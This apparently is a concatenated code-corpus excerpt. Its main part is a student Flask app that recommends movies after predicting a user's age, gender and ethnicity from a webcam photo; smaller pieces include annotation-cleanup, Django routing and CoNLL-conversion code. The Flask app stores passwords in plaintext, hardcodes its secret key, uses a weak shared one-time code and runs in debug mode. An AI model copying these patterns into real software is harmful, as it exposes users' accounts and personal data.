positions1 = []
positions2 = []
counts = np.random.randint(10, 20)
unit = (max - change) / counts
for i in range(counts):
position1 = change1 + (i + 1) * unit + np.random.randint(-10, 10)
if (position1 < max):
positions1.append(int(position1))
positions2.append(int(change2 + np.random.randint(1, 8)))
else:
break
if x == change:
return positions1, positions2
if y == change:
return positions2, positions1
def mergeJson():
img_dir_path = './wrong_labels/'
paths = glob.glob(os.path.join(img_dir_path, '*'))
# all_json ={}
for path in paths:
print(path)
json_paths = glob.glob(os.path.join(path, 'via_region_data_*.json'))
json_extend = {}
for json_path in json_paths:
annotations = json.load(open(json_path))
for key, annotation in annotations.items():
regions = annotation['regions']
filename = annotation['filename']
image_file_path = os.path.join(path, filename)
if (len(regions) == 0):
try:
if os.path.exists(image_file_path):
os.remove(image_file_path)
# del annotations[key]
print('删除文件:' + str(image_file_path))
except Exception as e:
print('文件删除失败:' + str(img_dir_path))
else:
for region in regions:
region_attributes = region['region_attributes']
region_attributes['name'] = 'wrong'
new_image_name = path.split('/')[2] + '_' + filename
annotation['filename'] = new_image_name
new_image_path = os.path.join(path, new_image_name)
if os.path.exists(image_file_path):
file_size = int(os.path.getsize(image_file_path))
os.rename(image_file_path, new_image_path)
if os.path.exists(new_image_path):
file_size = int(os.path.getsize(new_image_path))
annotation['size'] = file_size
json_extend[new_image_name + str(file_size)] = annotation
# all_json.update(json_extend)
# json_extend.update(annotations)26 27 12 32 30 + 28
print(len(json_extend))
save_json(os.path.join(path, 'via_region_data.json'),
json_extend)
def resize():
img_dir_path = './dataset'
img_type = 'val'
img_new = img_type + '_new'
json_path = os.path.join(img_dir_path, img_type, 'via_region_data.json')
json_extend = {}
annotations = json.load(open(json_path))
for key, annotation in annotations.items():
regions = annotation['regions']
filename = annotation['filename']
image_file_path = os.path.join(img_dir_path, img_type, filename)
try:
if os.path.exists(image_file_path):
image = cv2.imread(image_file_path, flags=cv2.IMREAD_COLOR)
image = cv2.resize(image, None, fx=0.33, fy=0.33, interpolation=cv2.INTER_LINEAR)
resize_image_path = os.path.join(img_dir_path, img_new, filename)
cv2.imwrite(resize_image_path, image)
file_size = int(os.path.getsize(resize_image_path))
for region in regions:
all_points_x = region['shape_attributes']['all_points_x']
all_points_y = region['shape_attributes']['all_points_y']
region['shape_attributes']['all_points_x'] = (
(np.asarray(all_points_x) * 0.33).astype(int)).tolist()
region['shape_attributes']['all_points_y'] = (
(np.asarray(all_points_y) * 0.33).astype(int)).tolist()
annotation['size'] = file_size
json_extend[filename + str(file_size)] = annotation
except Exception as e:
print('error:' + str(e))
print(len(json_extend))
save_json(
os.path.join(img_dir_path, img_new, 'via_region_data.json'),
json_extend)
if __name__ == '__main__':
resize()
| 2.0625 | 2 |
Movie Recommender System Based on User Demographics Prediction/App/app.py | Mohammed-Khaled1/ITI_AI-PRO_Graduation_Project | 0 | 12757379 | <gh_stars>0
###################### Importing Libraries ######################
from flask import Flask, g, redirect, render_template, request, session, url_for
from flask_mysqldb import MySQL
# from flask_sqlalchemy import SQLAlchemy
from flask_mail import Mail, Message
import emoji
import random
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import cv2
import time
import sys
import os
from keras.models import load_model
###########################################################################
# To make camera window active
os.system('''/usr/bin/osascript -e 'tell app "Finder" to set frontmost of process "python" to true' ''')
###########################################################################
# User class for the users in the app
# class User:
# def __init__(self, id, username, password):
# self.id = id
# self.username = username
# self.password = password
# def __repr__(self):
# return f'<User: {self.username}>'
# users = []
# users.append(User(id=1, username='Kareem', password='<PASSWORD>'))
# users.append(User(id=2, username='Alex', password='<PASSWORD>'))
# users.append(User(3, 'Mike', 'xyz'))
# print(users)
###################### APP Creation & Configurations ######################
# Create an instance of Flask class for the web app
app = Flask(__name__)
app.secret_key = 'secretKey1'
mail = Mail(app) # instantiate the mail class
# Configuring the web sql serverd
app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_USER'] = 'root'
app.config['MYSQL_PASSWORD'] = ''
app.config['MYSQL_DB'] = 'graduation_project'
mysql = MySQL(app)
# configuration of mail
app.config['MAIL_SERVER']='smtp.gmail.com'
app.config['MAIL_PORT'] = 465
app.config['MAIL_USERNAME'] = '<EMAIL>'
app.config['MAIL_PASSWORD'] = '<PASSWORD>'
app.config['MAIL_USE_TLS'] = False
app.config['MAIL_USE_SSL'] = True
mail = Mail(app)
###################### CONSTANT & GLOBAL VARIABLES ######################
# Keras models path
AGE_MODEL_PATH = "models/aaage_best_model_last6.h5"
ETHNICITY_MODEL_PATH = "models/Adagrad_test_ethnicity_model.h5"
GENDER_MODEL_PATH = "models/gender_best_model.h5"
# Photos Path
FACE_DETECTOR_PATH = 'static/haarcascade_frontalface_default.xml'
USER_PHOTO_PATH = "static/user_photos/"
GUEST_PHOTO_PATH = "static/guest_photos/"
#### Model Labels ####
# Age labels
AGE_LABELS = ['Under 25', '25-34', '35-44', '45-55', '55+']
DF_AGE_LABELS = ['18', '25', '35', '45', '50', '56']
# Ethnicity labels
ETHNICITY_LABELS = ['American-European', 'African', 'Japanese', 'Indian', 'Latin']
# Gender labels
GENDER_LABELS = ['Male', 'Female']
# Movie Genres
MOVIE_GENRES = ['Action', 'Adventure', 'Animation', 'Children', 'Comedy', 'Crime', 'Documentary', 'Drama', 'Fantasy', 'Horror', 'Musical', 'Mystery', 'Romance', 'Sci-Fi', 'Thriller', 'War']
# OTP CODE
OTP = ''
#########################################################################
# Get all App users
# def get_all_users():
# cur = mysql.connection.cursor()
# cur.execute("SElECT * FROM users_info")
# all_users = cur.fetchall()
# cur.close()
# return all_users
#######################################################
# g object is a global variable for one specific request.
# It is used to store data b\w different functions without passing them directly.
@app.before_request
def before_request():
g.user = None
if 'user_id' in session:
# Get all users from database
# cur = mysql.connection.cursor()
# cur.execute("SElECT * FROM users_info")
# all_users = cur.fetchall()
# cur.close()
# user = [user for user in users if user.id == session['user_id']][0]
# # print('inside before request :', user)
# g.user = user
# all_users = get_all_users()
# user = [user for user in all_users if user[0] == session['user_id']][0]
# g.user = user
##################################### Other solution
# print('################# inside before_request', file=sys.stderr)
# print('type(session["user_id"]) =', type(session), file=sys.stderr)
# print('session["user_id"] =', session['user_id'], file=sys.stderr)
# print('session["user_id"][0]', session['user_id'][0], file=sys.stderr)
# Get the user record from the database
try:
cur = mysql.connection.cursor()
cur.execute("SELECT * FROM users_info WHERE id = %s", (str(session['user_id']),))
user = cur.fetchall()[0]
cur.close()
# print('after query in before_request', file=sys.stderr)
# print('type(user) =', type(user), file=sys.stderr)
# print('user =', user, file=sys.stderr)
# print('user[0] =', user[0], file=sys.stderr)
g.user = user
except:
print('No users with this id', file=sys.stderr)
try:
cur = mysql.connection.cursor()
cur.execute("SELECT * FROM users_info WHERE Email = %s", (str(session['user_id']),))
user = cur.fetchall()[0]
cur.close()
# print('after query in before_request', file=sys.stderr)
# print('type(user) =', type(user), file=sys.stderr)
# print('user =', user, file=sys.stderr)
# print('user[0] =', user[0], file=sys.stderr)
g.user = user
except:
print('No users with this Email (Forget Password)', file=sys.stderr)
#######################################################
# the root page redirects to the login page
@app.route('/')
def mainPage():
return redirect(url_for('login_signup'))
# Login + Signup Page
@app.route('/login_signup', methods=['GET', 'POST'])
def login_signup():
msg = ""
confirmed = 1
if request.method == 'POST':
# Clear session
session.pop('user_id', None)
##### Log in Page #####
if "btn_login_submit" in request.form:
# Login variables
logEmail = request.form['logEmail']
logPass = request.form['logPass']
# if logEmail != '' and logPass != '':
# Get all users from database
# cur = mysql.connection.cursor()
# cur.execute("SElECT * FROM users_info")
# all_users = cur.fetchall()
# cur.close()
#####################################
# all_users = get_all_users()
# user = [user for user in all_users if user[3] == logEmail][0]
# print('inside login function', user)
# if user and user[4] == logPass:
# session['user_id'] = user[0]
# return redirect(url_for('profile'))
# return redirect(url_for('login_signup'))
#####################################
##################################### Other solution
try:
# Get the user record from the database
cur = mysql.connection.cursor()
cur.execute("SELECT * FROM users_info WHERE Email = %s", (logEmail,))
curr_user = cur.fetchall()[0]
cur.close()
# print('################### inside login', file=sys.stderr)
# print('type(curr_user) =', type(curr_user), file=sys.stderr)
# print('curr_user =', curr_user, file=sys.stderr)
# print('curr_user[0] =', curr_user[0], file=sys.stderr)
# Check user password
if curr_user[4] == logPass:
session['user_id'] = curr_user[0]
# print('################### inside try if password', file=sys.stderr)
# print('type(session["user_id"]) =', type(session['user_id']), file=sys.stderr)
# print('session["user_id"]', session['user_id'], file=sys.stderr)
# print('session["user_id"][0]', session['user_id'][0], file=sys.stderr)
return redirect(url_for('home'))
except:
msg = 'Incorrect Email or Password !!'
# print('################### inside except', file=sys.stderr)
# print(curr_user, file=sys.stderr)
return render_template('login_signup.html', message=msg)
####################################################### end of Other solution
##### Sign up Page #####
if "btn_reg_submit" in request.form:
# Signup variables
details = request.form
regFirstName = details['regFirstName']
regLastName = details['regLastName']
regEmail = details['regEmail']
regPass = details['regPass']
regConfPass = details['regConfPass']
# genre = details['genre']
genre = 'Comedy' # Temporary
# print('################### inside login', file=sys.stderr)
# print('logEmail =', logEmail, file=sys.stderr)
# print('logPass =', logPass, file=sys.stderr)
##############################
# if regFirstName != '' and regLastName != '' and regEmail != '' and regPass != '' and regConfPass != '' and genre != '':
# if password != <PASSWORD>:
# msg = "Password mismatch"
# return render_template('signup.html', dataToRender=msg)
##############################
# Take a photo after clicking register button
photo_path = USER_PHOTO_PATH + regFirstName + '_' + str(int(time.time())) + '_photo.jpg'
# take_photo_timer(photo_path)
# take_photo_detect_face(photo_path)
take_photo_timer_detect_face(photo_path)
# Predict age, gender & age for the user from the photo taken
age = model_pred(AGE_MODEL_PATH, AGE_LABELS, photo_path)
ethnicity = model_pred(ETHNICITY_MODEL_PATH, ETHNICITY_LABELS, photo_path)
gender = model_pred(GENDER_MODEL_PATH, GENDER_LABELS, photo_path)
######################################################
# Send OTP code
# if request.method == 'POST':
# if request.form['send_code'] == 'Do Something':
# # Create OTP
# otp = str(random.randint(0, 999)).zfill(6)
# # Send verification code
# verify_mail(email, otp)
# # Check user verification code
# otp_user_entry = details['verify']
# if otp != conf_password:
# confirmed = 0
# msg = "Invalid Verification Code"
# return render_template('signup.html', dataToRender=msg)
######################################################
try:
# Insert the data to the database
cur = mysql.connection.cursor()
cur.execute("INSERT INTO users(First_Name, Last_Name, Email, Password) VALUES (%s, %s, %s, %s)", (regFirstName, regLastName, regEmail, regPass))
cur.execute("INSERT INTO users_info(First_Name, Last_Name, Email, Password, Genre, Age, Ethnicity, Gender, Photo_path, Confirmed) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)", (regFirstName, regLastName, regEmail, regPass, genre, age, ethnicity, gender, photo_path, confirmed))
mysql.connection.commit()
cur.close()
return redirect(url_for('login_signup'))
except:
# print('inside except', file=sys.stderr)
# print(curr_user, file=sys.stderr)
return render_template('login_signup.html')
return render_template('login_signup.html')
##########################################################################
# Forget password page
@app.route('/forget',methods=['GET', 'POST'])
def forget():
confirmed = 0
msg = ''
global OTP
if request.method == 'POST':
email = request.form['email']
# print('################### Inside POST ', file=sys.stderr)
# print('email =', email, file=sys.stderr)
try:
# check if the email is in the database
cur = mysql.connection.cursor()
cur.execute("SELECT * FROM users WHERE Email = %s", (email,) )
cur.execute("SELECT * FROM users_info WHERE Email = %s", (email,) )
curr_user = cur.fetchall()[0]
cur.close()
if curr_user == ():
msg = 'Email not found'
return render_template('forget.html', message=msg)
except:
msg = 'Email not found'
# print('################### Inside Except DB ERROR', file=sys.stderr)
return render_template('forget.html', message=msg)
if "btn_verify_submit" in request.form:
# Check user verification code
otp_user_entry = request.form['verify_otp']
if OTP != otp_user_entry:
confirmed = 0
msg = "Invalid Verification Code"
# print('################### OTP not matched ', file=sys.stderr)
return render_template('forget.html', message=msg)
else:
confirmed = 1
session['user_id'] = email
# print('################### OTP matched ', file=sys.stderr)
# print('session["user_id"] =', session['user_id'], file=sys.stderr)
# print('g.user[0] =', g.user[0], file=sys.stderr)
return redirect(url_for('change_pass'))
if "btn_resend_submit" in request.form:
# Create OTP
OTP = str(random.randint(0, 999)).zfill(6)
# Send verification code
verify_mail(email, OTP)
# print('################### OTP Resend', file=sys.stderr)
return render_template('forget.html', storedEmail=email)
######################################################
return render_template('forget.html')
#######################################################
# Change Password Page
@app.route('/change_pass', methods=['GET', 'POST'])
def change_pass():
if not g.user:
return redirect(url_for('login_signup'))
if request.method == "POST" :
email = g.user[3]
password = request.form['regConfPass']
# Update the record in the database
cur = mysql.connection.cursor()
cur.execute("UPDATE users SET Password = %s WHERE Email = %s", (password, email) )
cur.execute("UPDATE users_info SET Password = %s WHERE Email = %s", (password, email) )
mysql.connection.commit()
cur.close()
return redirect(url_for('login_signup'))
return render_template('change_pass.html')
#######################################################
# Home + Recommendation Page
@app.route('/home', methods=['GET', 'POST'])
def home():
if not g.user:
return redirect(url_for('login_signup'))
if request.method == "POST" :
movie_genres = request.form['movie_genres']
# print('################## movie_genres\n', movie_genres, file=sys.stderr)
#################################################################
# get all movies and users interactions from the database
cur = mysql.connection.cursor()
# cur.execute("SELECT Genre, Age, Ethnicity, Gender FROM users_info where id = %s", (g.user[0],))
# cur.execute("SElECT Genre, Age, Ethnicity, Gender FROM users_info where id = %s", (7,))
cur.execute("SELECT * FROM users_interactions")
all_users_interactions = cur.fetchall()
cur.execute("SELECT * FROM movies")
all_movies = cur.fetchall()
cur.close()
# Convert the output to the dataframe
users_interactions_df = pd.DataFrame(all_users_interactions)
users_interactions_df.columns = ['bucketized_user_age', 'movie_genres', 'movie_id', 'movie_title', 'user_gender', 'user_id', 'user_rating', 'year']
all_movies_df = pd.DataFrame(all_movies)
all_movies_df.columns = ['movie_id', 'movie_genres', 'movie_title']
# print('################## users_interactions_df\n', users_interactions_df, file=sys.stderr)
# print('################## all_movies_df\n', all_movies_df, file=sys.stderr)
# df_size
df_size = pd.DataFrame(users_interactions_df.groupby('movie_id').size().sort_values(ascending=False))
list(df_size.columns)
df_size['size'] = df_size[0]
df_size.drop(columns=[0],inplace=True)
df_size = df_size[df_size['size']>50]
most_pop=list(df_size.index)
# print('################## df_size\n', df_size, file=sys.stderr)
# Convert the age range into a single age within the range
user_age_range = g.user[6]
index = AGE_LABELS.index(user_age_range)
age = DF_AGE_LABELS[index]
# print('################## age\n', age, file=sys.stderr)
# Get recommendations for the user
recommendations = recommend_movies(n_top=10, age=int(age), gender=g.user[8], genre=movie_genres, df_ratings_final=users_interactions_df, df_size=df_size, df_movies=all_movies_df)
# recommendations = recommend_movies(n_top=20, age=18, gender='Male', genre=['Action'], df_ratings_final=users_interactions_df, df_size=df_size, df_movies=all_movies_df)
# print('################## recommendations\n', recommendations, file=sys.stderr)
# Send recommendations to the user's email
send_recommendations_to_mail(g.user, movie_genres, recommendations)
return render_template('recommended_movies.html', len=len(recommendations), recommendations=recommendations)
#######################
return render_template('home.html', len=len(MOVIE_GENRES), MOVIE_GENRES=MOVIE_GENRES)
#######################################################
# Profile Page
@app.route('/profile')
def profile():
if not g.user:
return redirect(url_for('login_signup'))
return render_template('profile.html')
#######################################################
# Edit profile page
@app.route('/profile_edit', methods=['GET', 'POST'])
def profile_edit():
msg = ''
if not g.user:
return redirect(url_for('login_signup'))
if request.method == "POST" :
user_id = g.user[0]
details = request.form
first_name = details['fname']
last_name = details['lname']
email = details['email']
password = g.user[4]
age = details['age_labels_opt']
ethnicity = details['ethnicity_labels_opt']
gender = details['gender_labels_opt']
photo_path = g.user[9]
# Update the record in the database
cur = mysql.connection.cursor()
cur.execute("UPDATE users SET First_Name = %s, Last_Name = %s, Email = %s, Password = %s WHERE id = %s", (first_name, last_name, email, password, user_id))
cur.execute("UPDATE users_info SET First_Name = %s, Last_Name = %s, Email = %s, Password = %s, Age = %s, Ethnicity = %s, Gender = %s, Photo_path = %s WHERE id = %s", (first_name, last_name, email, password, age, ethnicity, gender, photo_path, user_id))
mysql.connection.commit()
cur.close()
msg = 'Changes Saved Successfully'
return render_template('profile_edit.html', len=len(GENDER_LABELS), len_ETHNICITY=len(ETHNICITY_LABELS), len_AGE_LABELS=len(AGE_LABELS), GENDER_LABELS=GENDER_LABELS, ETHNICITY_LABELS=ETHNICITY_LABELS, AGE_LABELS=AGE_LABELS, Message=msg)
return render_template('profile_edit.html', len=len(GENDER_LABELS), len_ETHNICITY=len(ETHNICITY_LABELS), len_AGE_LABELS=len(AGE_LABELS), GENDER_LABELS=GENDER_LABELS, ETHNICITY_LABELS=ETHNICITY_LABELS, AGE_LABELS=AGE_LABELS, Message=msg)
#######################################################
# Home + Recommendation for Guests Page
@app.route('/home_guest', methods=['GET', 'POST'])
def home_guest():
#################################################################
# get all movies and users interactions from the database
cur = mysql.connection.cursor()
# cur.execute("SELECT Genre, Age, Ethnicity, Gender FROM users_info where id = %s", (g.user[0],))
# cur.execute("SElECT Genre, Age, Ethnicity, Gender FROM users_info where id = %s", (7,))
cur.execute("SELECT * FROM users_interactions")
all_users_interactions = cur.fetchall()
cur.execute("SELECT * FROM movies")
all_movies = cur.fetchall()
cur.close()
# Convert the output to the dataframe
users_interactions_df = pd.DataFrame(all_users_interactions)
users_interactions_df.columns = ['bucketized_user_age', 'movie_genres', 'movie_id', 'movie_title', 'user_gender', 'user_id', 'user_rating', 'year']
all_movies_df = pd.DataFrame(all_movies)
all_movies_df.columns = ['movie_id', 'movie_genres', 'movie_title']
# print('################## users_interactions_df\n', users_interactions_df, file=sys.stderr)
# print('################## all_movies_df\n', all_movies_df, file=sys.stderr)
# df_size
df_size = pd.DataFrame(users_interactions_df.groupby('movie_id').size().sort_values(ascending=False))
list(df_size.columns)
df_size['size'] = df_size[0]
df_size.drop(columns=[0],inplace=True)
df_size = df_size[df_size['size']>50]
most_pop=list(df_size.index)
# print('################## df_size\n', df_size, file=sys.stderr)
if request.method == "POST" :
movie_genres = request.form['movie_genres']
# print('################## movie_genres\n', movie_genres, file=sys.stderr)
# Take a photo after clicking register button
photo_path = GUEST_PHOTO_PATH + 'guest_' + str(int(time.time())) + '_photo.jpg'
# take_photo_timer(photo_path)
# take_photo_detect_face(photo_path)
take_photo_timer_detect_face(photo_path)
# Predict age, gender & age for the user from the photo taken
age = model_pred(AGE_MODEL_PATH, AGE_LABELS, photo_path)
ethnicity = model_pred(ETHNICITY_MODEL_PATH, ETHNICITY_LABELS, photo_path)
gender = model_pred(GENDER_MODEL_PATH, GENDER_LABELS, photo_path)
# Convert the age range into a single age within the range
user_age_range = age
index = AGE_LABELS.index(user_age_range)
age = DF_AGE_LABELS[index]
# print('################## age\n', age, file=sys.stderr)
# print('################## gender\n', gender, file=sys.stderr)
# Get recommendations for the guest
recommendations = recommend_movies(n_top=5, age=int(age), gender=gender, genre=movie_genres, df_ratings_final=users_interactions_df, df_size=df_size, df_movies=all_movies_df)
# recommendations = recommend_movies(n_top=5, age=18, gender='Male', genre=['Action'], df_ratings_final=users_interactions_df, df_size=df_size, df_movies=all_movies_df)
# print('################## recommendations\n', recommendations, file=sys.stderr)
return render_template('recommended_movies.html', len=len(recommendations), recommendations=recommendations)
#######################
return render_template('home_guest.html', len=len(MOVIE_GENRES), MOVIE_GENRES=MOVIE_GENRES)
#######################################################
# 404 Page
# @app.route('/<page_name>')
# def other_page(page_name):
# response = make_response('The page named %s does not exist.' \
# % page_name, 404)
# return response
@app.errorhandler(404)
def page_not_found(error):
return 'Page Not Found 404'
################################################ Functions ################################################
######################## Webcam + Face Detection Function ########################
def take_photo_detect_face(photo_path):
# Load the file to detect the faces
faceCascade = cv2.CascadeClassifier(FACE_DETECTOR_PATH)
# cascPath = sys.argv[1]
# faceCascade = cv2.CascadeClassifier(cascPath)
# Open the camera
video_capture = cv2.VideoCapture(0)
# Used in the while loop
faces = ()
face_images = []
# If no face was detected or there is more than one face detected loop and don't capture photo
while faces == () or len(face_images) > 1:
# Capture frame-by-frame & convert to gray scale
ret, frame = video_capture.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# minimize the frame
faces = faceCascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=5)
face_images= []
# Draw a rectangle around the face
for (x, y, w, h) in faces:
cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)
# Get the area inside the rectangle
face_images.append( frame[y+2:y+h-1, x+2:x+w-1] )
# cv2.imshow( frame[y:y+h, x:x+w] )
# Display the resulting frame
cv2.imshow('Camera', face_images[0])
# print(face_images)
# Save the frame
cv2.imwrite(photo_path, face_images[0])
# When everything is done, release the capture and close all opened windows
video_capture.release()
cv2.destroyAllWindows()
######################## Webcam Function ########################
def take_photo_timer(photo_path):
# SET THE COUNTDOWN TIMER
TIMER = int(5)
# Open the camera
cap = cv2.VideoCapture(0)
# begin countdown
prev = time.time()
# Keep looping until photo is taken
while TIMER >= 0:
# Read and display each frame
ret, img = cap.read()
# Display countdown on each frame
# specify the font and draw the countdown using putText
font = cv2.FONT_HERSHEY_PLAIN
cv2.putText(img, str(TIMER), (200, 250), font, 7, (255, 255, 255), 7, cv2.LINE_AA)
cv2.imshow('Camera', img)
cv2.waitKey(125)
# current time
cur = time.time()
# Update and keep track of Countdown
# if time elapsed is one second then decrease the counter
if cur-prev >= 1:
prev = cur
TIMER = TIMER-1
# Read and display each frame
ret, img = cap.read()
# Display the clicked frame for 2 sec. Also increased time by 1 sec in waitKey
cv2.imshow('Photo', img)
# time for which image displayed
cv2.waitKey(1000)
# Save the frame
cv2.imwrite(photo_path, img)
# close the camera
cap.release()
# close all the opened windows
cv2.destroyAllWindows()
######################## Camera + Face Detection + Timer Function ########################
def take_photo_timer_detect_face(photo_path):
# This file is used to detect the faces
faceCascade = cv2.CascadeClassifier(FACE_DETECTOR_PATH)
# Used in the while loop
faces = ()
face_images = []
# Open the camera
cap = cv2.VideoCapture(0)
# If no face was detected or there is more than one face detected loop and don't capture photo
while faces == () or len(face_images) > 1:
# Set the countdown timer
TIMER = int(3)
# begin countdown
prev = time.time()
# Keep looping until timer is over & photo is taken
while TIMER >= 0:
# Reset the countdown timer whenever there is no face or more than a face detected
if faces == () or len(face_images) > 1:
TIMER = int(3)
prev = time.time()
# Read and display each frame & convert to gray scale
ret, frame = cap.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# Display countdown on each frame
# specify the font and draw the countdown using putText
font = cv2.FONT_HERSHEY_COMPLEX_SMALL
cv2.putText(frame, 'Show Your Face', (50, 50), font, 2, (255, 50, 50), 3, cv2.LINE_AA)
cv2.putText(frame, str(TIMER), (50, 150), font, 3, (255, 50, 50), 3, cv2.LINE_AA)
cv2.imshow('Camera', frame)
cv2.waitKey(150)
# find faces and reduce the image scale
# returns the positions of detected faces as Rect(x,y,w,h).
faces = faceCascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=5)
face_images= []
# Draw a rectangle around the face
for (x, y, w, h) in faces:
cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)
# Get the area inside the rectangle
face_images.append( frame[y+2:y+h-1, x+2:x+w-1] )
# current time
cur = time.time()
# Update and keep track of Countdown
# if time elapsed is one second then decrease the counter
if cur-prev >= 1:
prev = cur
TIMER = TIMER-1
# Read and display each frame
ret, img = cap.read()
# Display the clicked frame for 2 sec. Also increased time by 1 sec in waitKey
cv2.imshow('Photo', face_images[0])
# time for which image displayed
cv2.waitKey(1000)
# Save the frame
cv2.imwrite(photo_path, face_images[0])
# close the camera
cap.release()
# close all the opened windows
cv2.destroyAllWindows()
######################## Model Function ########################
# Predict either age, ethnicity or gender prediction
def model_pred(MODEL_PATH, MODEL_LABELS, photo_path):
# Load the user photo & resize it
img = cv2.imread(photo_path)
# img = cv2.imread("static/user_photos/europeanPerson3.png")
resized_img = cv2.resize(img, (48, 48))
resized_img_gray = cv2.cvtColor(resized_img, cv2.COLOR_BGR2GRAY)
resized_img_gray_shape = (1, 48, 48, 1)
resized_img_gray = resized_img_gray.reshape(*resized_img_gray_shape)
X = resized_img_gray
# Load the model
model = load_model(MODEL_PATH)
pred = model.predict(X)
# Selecting the model label that was predicted
y_model_predict = np.argmax(pred,axis=1)
prediction = MODEL_LABELS[int(y_model_predict)]
return prediction
######################## Email Functions ########################
# Send Email Verfication
def verify_mail(email, otp):
user_email = email
msg = Message('Flask APP verification', sender = '<EMAIL>', recipients = [user_email])
msg.body = 'Your verification Code\n' + str(otp)
mail.send(msg)
return 'Sent'
# Send mail to user
def send_recommendations_to_mail(user_info, movie_genres, recommendations):
user_fname = user_info[1]
user_email = user_info[3]
recommendations_str = ""
for movie in recommendations:
recommendations_str += str(movie)+'\n'
msg = Message('Movie Recommendations from Flask APP', sender ='<EMAIL>', recipients = [user_email] )
msg.body = 'Hello ' + user_fname + ',' + '\n' + \
'Chosen Movie Genre : "' + movie_genres + '"\n' + \
'Here are some movie recommendations for you :' + '\n' + \
recommendations_str + '\n' + \
'Enjoy '+ emoji.emojize(":grinning_face_with_big_eyes:")
mail.send(msg)
return 'Sent'
######################## Recommender Function ########################
def recommend_movies(n_top, age, gender, genre, df_ratings_final, df_size, df_movies):
# Loop on all movie genres and
exists=[]
for row in df_ratings_final.movie_genres:
for item in genre:
if row.find(item):
found=1
exists.append(found)
break
df_new=df_ratings_final.copy()
df_new['exists']=exists
df_new=df_new[(df_new['bucketized_user_age']==age) & (df_new['exists']==1) & (df_new['user_gender']==gender)]
df_new=df_new.groupby('movie_id').mean('user_rating')
#df_new=pd.concat([df_new, df_size], axis=1, join = 'outer')
df_new=pd.merge(df_new, df_size, left_index=True, right_index=True, how='left')
df_new=df_new.sort_values(by=['user_rating','year','size'],ascending=False)
final_df=pd.merge(df_new,df_movies, left_index=True, right_index=True, how='left')
recommended_movies=list(final_df['movie_title'])[0:n_top]
return recommended_movies
######################## RUN APP ########################
# test = get_all_users()
# print('test', test)
# __name__ gets the value "__main__" when executing the script
# Run when the script is executed
if __name__ == '__main__':
app.run(debug=True) | 2.171875 | 2 |
config/urls.py | git-shuvam/recipe-app-api | 0 | 12757380 | from django.contrib import admin
from django.urls import path, include
from django.conf.urls.static import static
from django.conf import settings
from rest_framework.documentation import include_docs_urls
urlpatterns = [
path('admin/', admin.site.urls),
path('api/user/', include('apps.user.urls'), name='user'),
path('api/recipe/', include('apps.recipe.urls'), name='recipe'),
path('docs/', include_docs_urls(title='Recipe App API')),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| 1.609375 | 2 |
surface/converter.py | adaamko/surface_realization | 0 | 12757381 | <filename>surface/converter.py
import sys
import argparse
import json
import os
import re
from collections import defaultdict
from surface.utils import REPLACE_MAP, sanitize_word
def build_dictionaries(filepaths):
word_to_id = {}
id_to_word = {}
graph_data = {}
word_count = 1
for filepath in filepaths:
with open(filepath, "r") as f:
for i, line in enumerate(f):
if line == "\n":
words = []
for w in graph_data:
word = graph_data[w]["word"].lower()
if word not in word_to_id:
word_unique = "WORD" + str(word_count)
word_to_id[word] = word_unique
id_to_word[word_unique] = word
word_count += 1
graph_data = {}
continue
if line.startswith("#"):
continue
if line != "\n":
fields = line.split("\t")
word_id = fields[0]
word = fields[2]
lemma = fields[1]
tree_pos = fields[3]
ud_pos = fields[4]
mor = fields[5]
head = fields[6]
ud_edge = fields[7]
comp_edge = fields[8]
space_after = fields[9]
make_default_structure(graph_data, word_id)
graph_data[word_id]["word"] = lemma
graph_data[word_id]["tree_pos"] = sanitize_word(tree_pos)
graph_data[word_id]["mor"] = mor
make_default_structure(graph_data, head)
graph_data[head]["deps"][word_id] = ud_edge
return word_to_id, id_to_word
def get_args():
parser = argparse.ArgumentParser(
description="Convert conllu file to isi file")
parser.add_argument("conll_file", type=str, help="path to the CoNLL file")
return parser.parse_args()
def to_tokenized_output(result_dir, output_dir):
for filename in os.listdir(result_dir):
result_filename = os.path.join(result_dir, filename)
output_filename = os.path.join(
output_dir, filename.split(".")[0] + ".txt")
sentences = []
current_sentence = []
with open(result_filename, "r") as f:
for i, line in enumerate(f):
if line == "\n":
sen = " ".join(current_sentence)
current_sentence = []
sentences.append(sen)
if line.startswith("#"):
continue
if line != "\n":
fields = line.split("\t")
word_id = fields[0]
word = fields[2]
current_sentence.append(word)
with open(output_filename, "w") as f:
for i, sentence in enumerate(sentences):
# if i > 942:
# f.write("#sent_id = " + str(i-943+1) + "\n")
# f.write("# text = " + sentence + "\n")
# f.write("\n")
f.write("#sent_id = " + str(i+1) + "\n")
f.write("#text = " + sentence + "\n")
f.write("\n")
def extract_rules(dev, word_to_id):
graph_data = {}
noun_list = []
id_to_rules = defaultdict(list)
id_to_sentence = {}
sentences = 0
with open(dev, "r") as f:
for i, line in enumerate(f):
if line == "\n":
words = []
for w in graph_data:
words.append(graph_data[w]["word"])
subgraphs = {"root": None, "graph": []}
rules = []
if "tree_pos" not in graph_data[w]:
subgraphs["root"] = "ROOT"
for dep in graph_data[w]["deps"]:
to_pos = graph_data[dep]["tree_pos"]
word = graph_data[dep]["word"].lower()
subgraphs["graph"].append(
{"to": (word.lower(), to_pos), "edge": "root", "dir": None})
id_to_rules[sentences].append(subgraphs)
continue
subgraphs["root"] = (
graph_data[w]["word"].lower(), graph_data[w]["tree_pos"])
for dep in graph_data[w]["deps"]:
edge_dep = graph_data[w]["deps"][dep]
to_pos = graph_data[dep]["tree_pos"]
word = graph_data[dep]["word"].lower()
mor = graph_data[dep]["mor"]
if "tree_pos" in graph_data[w]:
if "lin=+" in mor:
subgraphs["graph"].append(
{"to": (word.lower(), to_pos), "edge": edge_dep.replace(":", "_"), "dir": "S"})
elif "lin=-" in mor:
subgraphs["graph"].append(
{"to": (word.lower(), to_pos), "edge": edge_dep.replace(":", "_"), "dir": "B"})
else:
subgraphs["graph"].append(
{"to": (word.lower(), to_pos), "edge": edge_dep.replace(":", "_"), "dir": None})
